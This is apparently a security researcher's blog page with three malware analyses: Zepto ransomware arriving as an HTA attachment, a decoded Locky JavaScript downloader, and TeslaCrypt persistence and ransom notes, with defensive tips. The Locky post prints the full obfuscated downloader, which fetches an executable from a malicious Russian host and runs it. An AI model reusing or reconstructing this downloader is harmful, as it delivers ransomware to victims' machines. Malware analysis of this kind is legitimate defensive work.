Zepto Ransomware, The New Kid in Town

HTA Downloader delivers Zepto Ransomware

Attack Vector: Email Attachment
Malicious File: it5Ax.hta

The Zepto sample that we found this morning came in as a zipped email attachment that contained an HTML Application (.hta) file. HTA files are a combination of HTML and one or more scripting languages like VBScript or JScript. A quick look at this file below shows it is a combination of HTML with obfuscated JScript. One of the significant dangers with HTA files is once the file is downloaded and run, it is treated as a “fully trusted application”. Whereas when a regular HTML file is run the execution is confined to the security model of the web browser.

We’ve seen Zepto and its cousin Locky arrive in DOCM attachments in recent months and I am not surprised to see the evolution to HTA files. DOCM which stands for Document with Macros is a special document with embedded scripts written in VBA (Visual Basic Application). Macros however don’t run by themselves and require user assistance. Weather the file is an HTA or a DOCM, the result is the same; once run it downloads the malware from its C2 and runs it.

HTA Encoded JScript Downloader
HTA Encoded JScript Downloader
Exploit and Post Infection Traffic
Exploit and Post Infection Traffic

Post Compromise your files will be encrypted and file extensions changed to .zepto similar to Locky which changes your file extensions to .locky.

Post Compromise the file extensions changed to .zepto
Post Compromise the file extensions changed to .zepto

How to pay instructions will appear on the user Desktop and in every directory explaining your predicament.

Desktop Image displays Instructions
Desktop Image displays Instructions

Your personal identification ID in the help message is the same as the first half of each scrambled filename.

Conclusion
Locky and Zepto Ransomware are similar in several regards, for example both are distributed primarily in massive spam campaigns via zipped JScript attachments and they both leave behind the same type of files including a similar ransom note.

We expect to see more malware payloads sent as HTA documents so take a few precautions such as:

  • Change settings in control panel to show file extensions to protect against misleading file names.
  • Configure Office settings to not allow macros in documents to run from the internet.
  • Always open .JS files in Notepad.
  • Backup your files regularly.
  • Treat all attachments as suspect.
Facebooktwittergoogle_plusredditpinterestlinkedinmail

Decoding A Malicious Javascript Downloader

JavaScript Downloader Leads to Locky Ransomware

Attack Vector- Email Attachment      MX62EDO2016030179167.zip                                Malicious javescript file                        FG8327338338.js

The file is a downloader currently being sent as a compressed email attachment to prevent detection from Antivirus and IDS measures. When executed on a victims computer it downloads Locky Ransomware. The malware authors are using a simple hexadecimal obfuscation technique to hide the source of the payload. I wanted to show readers how to decode or convert the hexadecimal to ASCII to expose the domain that is serving this. Reviewing the entire JavaScript (found in the reference) you will see the obfuscation pretty easily.

Decode

To decode the hexadecimal remove the leading ‘\u00’ values in Yellow leaving only the Hexidecimal values (A-F 0-9). Pay attention to the other special characters and letters in Red.

hex                                       Obfuscated Hexadecimal URL

68 74 74 70 3A // 6D 6F 74 6F s. 72 75 2F ‘+’a’+’ 64m 69 6E 2F 6D o 64 e 6C 2F 38 37 79 68 62 35 34 cdf 79 2E e 78 e                                                                               Hexadecimal + Special Characters and ASCII Letters
                                                 

Decode on your favorite online hex decoder i.e. (http://ddecode.com or http://www.asciitohex.com) or simply remove the special characters and run it locally on a terminal as shown below.

# echo 687474703A6D6F746F72752F64696E2F6D646C2F383779 68623534792E78 |python3 -c “import sys, binascii; sys.stdout.buffer.write(binascii.unhexlify(input().strip()))”

                                         Terminal decode command

Combine the resulting string + Special Characters and ASCII letters exposes the URL that will serve the Malware.

  –       http://moto[.]ru/admin/model/87yhb54cdfy.exe

Recommendations

Never open attachments in emails unless you are expecting an attachment even if you know and trust the sender. Its easier to confirm the sender sent you the attachment then clean up a ransomware compromise.

Reference https://www.virustotal.com/en/file/557184BE5BD72298EC32E10E9225A448BC4C4C6121971B659F32B8C8D4B8316D/analysis/

https://malwr.com/analysis/ZDc4MmExYWYzZjJkNDUyYmE5MTllZjhkNGMxZTkyZTA/  

Full JavaScript file text

//(function( global, factory ) {

var FhCjGh = ‘\u0052un’; var ARDiz = this[(“lifestyle”,”individual”,”standings”,”warming”,”screech”,’\u0041c’)+’t\u0069’+’v\u0065X\u004F\u0062’+’\u006Aec\u0074′];

var xEsHeV = new ARDiz(‘W’+(“slammed”,”plumber”,’S’)+’\u0063\u0072ip\u0074.’+’\u0053\u0068ell’);

// if ( typeof module === “object” && typeof module.exports === “object” ) { // For CommonJS and CommonJS-like environments where a proper `window` // is present, execute the factory and get jQuery. // For environments that do not have a `window` with a `document` // (such as Node.js), expose a factory as module.exports. // This accentuates the need for the creation of a real `window`. // e.g. var jQuery = require(“jquery”)(window); // See ticket #14549 for more info. module.exports = global.document ? factory( global, true ) : function( w ) { if ( !w.document ) { throw new Error( “jQuery requires a window with a document” ); } return factory( w ); }; } else { factory( global );

var kjEEQvxTq = xEsHeV[(“saucer”,”hints”,’E\u0078pa\u006E\u0064′)+(“daytime”,”shelf”,”neuralgia”,’\u0045\u006E\u0076\u0069\u0072\u006Fnm\u0065′)+’\u006Et\u0053tr\u0069n’+’g\u0073′](‘%’+(“sublime”,”demagogue”,”samples”,’T’)+’E’+’\u004DP%’) + (“neptune”,”disclosure”,”gravy”,”fetching”,”explicit”,’\u002FKu\u0044\u0049′)+(“formative”,”clandestine”,’\u006FtQ’)+’j1\u002E’+’e\u0078e’;

//}// Pass this if window is not defined yet }(typeof window !== “undefined” ? window : this, function( window, noGlobal ) {

var sgOIi = new ARDiz(‘M’+(“partridge”,”holocaust”,”inert”,”incompetent”,’SX\u004D’)+’L\u0032.X\u004D\u004C\u0048T’+’T\u0050′);

//// Support: Firefox 18+ // Can”t be in strict mode, several libs including ASP.NET trace // the stack via arguments.caller.callee and Firefox dies if // you try to trace through “use strict” call chains. (#13335) //”use strict”; var deletedIds = [];

sgOIi[‘o\u006E’+’r\u0065\u0061\u0064y’+(“tuscany”,”quebec”,’s\u0074′)+(“journeyman”,”exemplify”,”dalton”,’a\u0074\u0065\u0063h\u0061\u006Eg\u0065’)] = function () {

if (sgOIi[‘r’+’\u0065\u0061d\u0079s’+’t’+(“massage”,”argumentative”,”grandpa”,”gender”,”musical”,’a\u0074e’)] === 4) {

var paHFKIl = new ARDiz((“augustinian”,”gunwale”,”shock”,’A\u0044′)+’\u004FD’+’\u0042.’+’\u0053\u0074re\u0061\u006D’);

//var document = window.document;

paHFKIl[‘\u006Fp\u0065n’]();

//var slice = deletedIds.slice;

paHFKIl[‘t\u0079\u0070e’] = 1;

//var concat = deletedIds.concat;

paHFKIl[‘w’+(“evolutionary”,”compression”,”unction”,’r’)+’i’+’\u0074e’](sgOIi[‘Re\u0073’+’p\u006F\u006Ese\u0042’+(“barque”,”poetess”,’o’)+’d\u0079′]);

//var push = deletedIds.push;

paHFKIl[(“everyday”,”deployment”,’p\u006Fs’)+’i’+’t’+’\u0069on’] = 0;

//var indexOf = deletedIds.indexOf;

paHFKIl[‘s\u0061’+(“perverted”,”curious”,”accede”,’ve\u0054′)+’o\u0046’+(“consistently”,”farmer”,”vocals”,’\u0069le’)](kjEEQvxTq, 2);

//var class2type = {};

paHFKIl[(“thrown”,”spalding”,’c’)+’l’+’o’+(“juvenile”,”cuckoo”,”coeval”,’s\u0065′)]();

//var toString = class2type.toString;

};

//var hasOwn = class2type.hasOwnProperty;

sgOIi[‘o\u0070e\u006E’](‘\u0047ET’, (“africa”,”digits”,”textbook”,’\u0068\u0074\u0074\u0070\u003A//e\u006D’)+’\u006F\u0074\u006Fs.\u0072\u0075\u002F’+’a’+’\u0064m\u0069\u006E\u002F\u006Do\u0064e\u006C\u002F\u0038\u0037\u0079\u0068\u0062\u0035\u0034cdf\u0079\u002Ee\u0078e’, false);

//var support = {};

sgOIi[‘s\u0065\u006Ed’]();

//

xEsHeV[FhCjGh](kjEEQvxTq, 1, “UNHUGlAh” === “JAFBXnHFM”);

//var version = “1.12.1”,

} catch (QMDvrsH) { };

// // Define a local copy of jQuery jQuery = function( selector, context ) {

Facebooktwittergoogle_plusredditpinterestlinkedinmail

TelsaCrypt Analysis

Ransomware Malware can be delivered in emails sent directly to a unsuspecting recipient or in a Drive by from a compromised website via  an Exploit Kit. Exploit Kits scan a users browsers to check their systems to see if its unpatched. Flash has been the most common vulnerability for malware delivery for some time. If the browser is not patched to the latest versions they get directed to a second site referred to as a Gate and finally a Malware site where the file gets served.

Detonation of the malware executable

http-pcap

POST Activity after detonation of the malware executable

Persistance is established by injecting a file in the RUN key which is a common technique malware authors use to ensure the malware can’t be removed by AntiVirus.

Regedit-presistance

Persistence is established

Once infected with Ransomware Malware the decryption instructions are dropped in every directory. The instructions are so helpful and as kindly as can be they explain how they are protecting your files. The Victims typically have 48 hours to pay the Ransom or lose their files.

HELP

Instructions 

Recommendations

This is easy to avoid.

  • update your Web Browser
  • Backup your files. If you have a backup it doesn’t matter if your files get encrypted.
  • Don’t pay. Ransomeware is becoming very popular because so many of the victims are paying.
  • Detach your external storage device. The malware will encrypt all files on the PC as well as any network drive or external storage the PC is attached to.

Reference

TeslaCrypt_Malware

HELP.png

The malware file is password protected with the usual password. If you don’t know it email me at admin@packetreport.com

Facebooktwittergoogle_plusredditpinterestlinkedinmail